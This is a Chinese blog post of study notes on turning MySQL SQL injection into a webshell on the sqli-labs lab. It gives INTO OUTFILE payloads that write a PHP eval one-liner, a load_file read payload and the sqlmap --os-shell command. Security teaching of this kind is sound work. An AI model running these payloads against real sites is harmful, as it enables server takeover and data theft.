sql注入之GETSHELL

最新推荐文章于 2024-05-20 10:00:15 发布
最新推荐文章于 2024-05-20 10:00:15 发布
阅读量566 收藏 11
点赞数 8
分类专栏: 理论 文章标签: sql 笔记
1
本文链接:https://blog.csdn.net/ymy13326056686/article/details/135973290
版权

2024.2.1

GETSHELL

利用SQL注入获取MYSQL数据库权限的要求:

文件读写基本要求:

  •  是root用户最高权限
  •  知道网站的绝对路径

文件读写注入的原理:

利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息

文件读写注入的条件:

高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限

secure_file_priv选项
secure_file_priv=代表对文件读写没有限制
secure_file_priv=NULL代表不能进行文件读写
secure_file_priv=d:/mysql/data代表只能对该路径下文件进行读写
show global variables like'%secure%查看mysql全局变量的配置

以下例子均为 sqli-labs-master 靶场环境

手工注入

文件的写入  

基本格式 :

'<文件内容>' into outfile/dumpfile '<待写入文件的绝对路径>'
区别outfiledumpfile
文件类型更适用于文本文件更适用于二进制文件
存储方式可以写多行只能写一行
脏数据
可选后缀作用示例结果
无后缀 
?id=1' union select 1,2,'<?php @eval($_POST["abc"]); ?>' into outfile "D:\\1.php" -- a
lines terminated by '<文本>'将文本写在最后 
?id=1' union select 1,2,'<?php @eval($_POST["abc"]); ?>' into outfile "D:\\3.php" lines terminated by '' -- a
lines starting by '<文本>'将文本写在最前 
?id=1' union select 1,2,'<?php @eval($_POST["abc"]); ?>' into outfile "D:\\4.php" lines starting by '666' -- a
fields/columns terminated by '<文本>'设置字段分割符 
?id=1' union select 1,2,'<?php @eval($_POST["abc"]); ?>' into outfile "D:\\5.php" fields terminated by '~~' -- a

文件的读取

load_file('<文件的绝对路径>')
?id=-1' union select 1,2,load_file('D:\\1.php') -- a

sqlmap注入

--os-shell
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 --os-shell

完成后会在指定位置生成木马文件

Z时代.bug(゜▽゜*)
关注
  • 8
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册1
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 1165
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。
Sql注入详解(原理篇)
Naive的博客
09-11 5961
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入详解
热门推荐
huangyongkang666的博客
03-20 4万+
SQL注入详解 1.SQL注入简介 ​ SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 ​ Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 2. sql 注入产生原因及威胁 ​ 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行
sql注入详解
m0_67392811的博客
06-12 5488
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
渗透测试-sql注入getshell的几种方式
lza20001103的博客
08-19 869
渗透测试-sql注入getshell的几种方式 文章目录渗透测试-sql注入getshell的几种方式一. into outfile(1)看secure-file-priv参数的值 介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。 一. into outfile 利用条件 此方法利用的先决条件 web目录具有写权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有具体值(在mysql/m
mysqlgetshell的方式
unexpectedthing的博客
03-17 4452
文章目录outfile和dumpfile写shell利用条件基于union联合查询:非联合查询outfile和dumpfile的区别secure_file_prive日志getshell慢日志getshell利用general_logbinlog的介绍 outfile和dumpfile写shell 利用条件 数据库当前用户为root权限; 知道当前网站的绝对路径; PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie) 写入的那个路径存在写入权限。 基于union联合查询: ?i
sql注入getshell的几种方式
yy
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell。
SQL注入-getshell
LJH1999ZN的博客
02-15 9957
一、getshell的含义 1.什么是shell? Shell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
AttackWebFrameworkTools:傻瓜式导入URL即可实现批量测试,能一键getshell检测绝不sql注入或不是只检测。其中thinkphp集成所有rce Exp Struts2集成了shack2和k8漏洞利用工具所有Exp他们他们的exp进行优化和修复此工具的所集成的整体漏洞是基于平时实战中所得到的经验从而写入到工具里。例如:通达oA一键getshell实战测试struts2一键getshell等等
02-16
AttackWebFrameworkTools 1.0 2021-02-15ReadTeam的AttackWebFrameworkTools更新状态日志: 2021-02-15新增activemq exp / poc 2021-02-14更新solr exp / poc结果增加了cve编号和断裂名称2021-02-12更新solr 4个exp ...
SQL注入(一)mysql数据库基础
shirlly_的博客
04-10 833
sql注入的基本原理与mysql数据库的查询
父子级分类统计分类下数量sql
pscool的博客
05-19 66
【代码】父子级分类统计分类下数量sql
小白也会SQL:大模型改变交互方式(中)
鲁班模锤
05-17 745
在人工智能与自然语言处理交汇点,有一种技术正悄然改变与数据交互的方式——将日常语言转化为精准SQL查询。这一“text-to-sql”转换任务,使非专业人士也能轻松驾驭复杂的数据库操作,极大地拓宽了数据应用的边界。
Oracle数据库之PL/SQL基本语法(八)
pursue_mony的博客
05-14 114
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
使用DBeaver的第2天-使用sql导入数据
2301_78094435的博客
05-14 248
但是如果你执行失败了,多半可能是因为本地没有部署mysql,记住只有本地有mysql才可以执行脚本,否则你只能粘贴脚本,到sql控制台执行了。特别注意,较长的脚本粘贴的话一定会闪退,所以只有安装mysql在本地才能解决这个问题;首先位置一定要放在库上(实例),放在表上可不好使用哦。使用sql导入数据这块我会仔细的说一下。然后点击工具-再点击执行脚本。
sql去除表中某个字段的空格
最新发布
HelloWorld的专栏
05-20 72
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
sql注入getshell
09-09
SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。通过注入恶意的SQL代码,攻击者可以获取敏感信息,甚至可以在目标系统上执行任意命令,从而获得对系统的完全控制。通过getshell技术,攻击者可以在没有合法帐户的情况下,对目标系统进行远程控制。因此,避免SQL注入攻击和保护系统安全是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Z时代.bug(゜▽゜*)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值